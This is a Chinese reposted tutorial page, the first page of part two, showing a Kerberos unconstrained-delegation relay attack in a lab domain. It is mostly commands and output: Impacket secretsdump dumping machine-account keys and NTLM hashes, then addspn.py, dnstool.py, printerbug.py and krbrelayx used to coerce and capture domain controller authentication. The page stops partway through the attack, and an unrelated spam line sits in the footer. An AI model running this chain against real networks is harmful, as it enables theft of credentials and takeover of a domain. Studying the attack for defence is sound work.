歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

Kerberos中繼攻擊:濫用無約束委派(下)

來源:本站整理 作者:佚名 時間:2019-10-06 TAG: 我要投稿

上一篇文章,我只講了中繼攻擊的基本理論,這篇文章,我會舉兩個示例來及具體說明。
示例1:使用計算機帳戶和SpoolService漏洞獲取DC同步權限
在第一種情況下,我們將濫用我的internal.corp實驗室域中的計算機帳戶的無約束委派權限。通過攻擊用戶testuser獲得了此主機的管理權限,該用戶是該主機上Administrators組的成員。我們將按照上面列出的步驟,首先獲取Kerberos密鑰和NTLM哈希:
[email protected]:~$ secretsdump.py [email protected]
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
Password:
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x38f3153a77837cf2c5d04b049727a771
...cut...
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ICORP\ICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
ICORP\ICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd
ICORP\ICORP-W10$:des-cbc-md5:91abd073c7a8e534
ICORP\ICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6:::
現在我們添加SPN,使用剛才轉儲的NTLM哈希作為設備帳戶進行身份驗證,該帳戶可以修改它自己的SPN,但只能通過前面討論過的msDS-AdditionalDnsHostName屬性進行修改。我們將使用addsp .py實用程序將SPN HOST/attack .internal.corp添加到計算機帳戶(用于SMB)。
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp -q icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=ICORP-W10,CN=Computers,DC=internal,DC=corp - STATUS: Read - READ TIME: 2019-01-09T21:55:23.923810
    dNSHostName: ICORP-W10.internal.corp
    sAMAccountName: ICORP-W10$
    servicePrincipalName: RestrictedKrbHost/ICORP-W10
                          HOST/ICORP-W10
                          RestrictedKrbHost/ICORP-W10.internal.corp
                          HOST/ICORP-W10.internal.corp
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
針對attacker.internal.corp的SPN現在存在于受害者帳戶中,但它的DNS條目尚不存在。我們使用dnstool.py實用程序添加記錄,指向攻擊者IP:
[email protected]:~/krbrelayx$ python dnstool.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r attacker.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
[email protected]:~/krbrelayx$ nslookup attacker.internal.corp 192.168.111.2
Server:  192.168.111.2
Address: 192.168.111.2#53
Name: attacker.internal.corp
Address: 192.168.111.87
現在,我們通過打印機漏洞讓域控制器對我們進行身份驗證,同時在導出模式啟動krbrelayx,其中所有提取的TGT都將保存到磁盤。我們為krbrelayx提供了AES256密鑰,因為默認情況下該密鑰將用于計算機帳戶。
[email protected]:~/krbrelayx$ python printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 internal.corp/icorp-w10\[email protected] attacker.internal.corp
[*] Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Attempting to trigger authentication via rprn RPC at icorp-dc.internal.corp
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
不同的屏幕上的krbrelayx:
[email protected]:~/krbrelayx$ sudo python krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab

[1] [2] [3] [4] [5]  下一頁

【聲明】:黑吧安全網(http://www.fhetww.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        江西十一选五走势图爱彩乐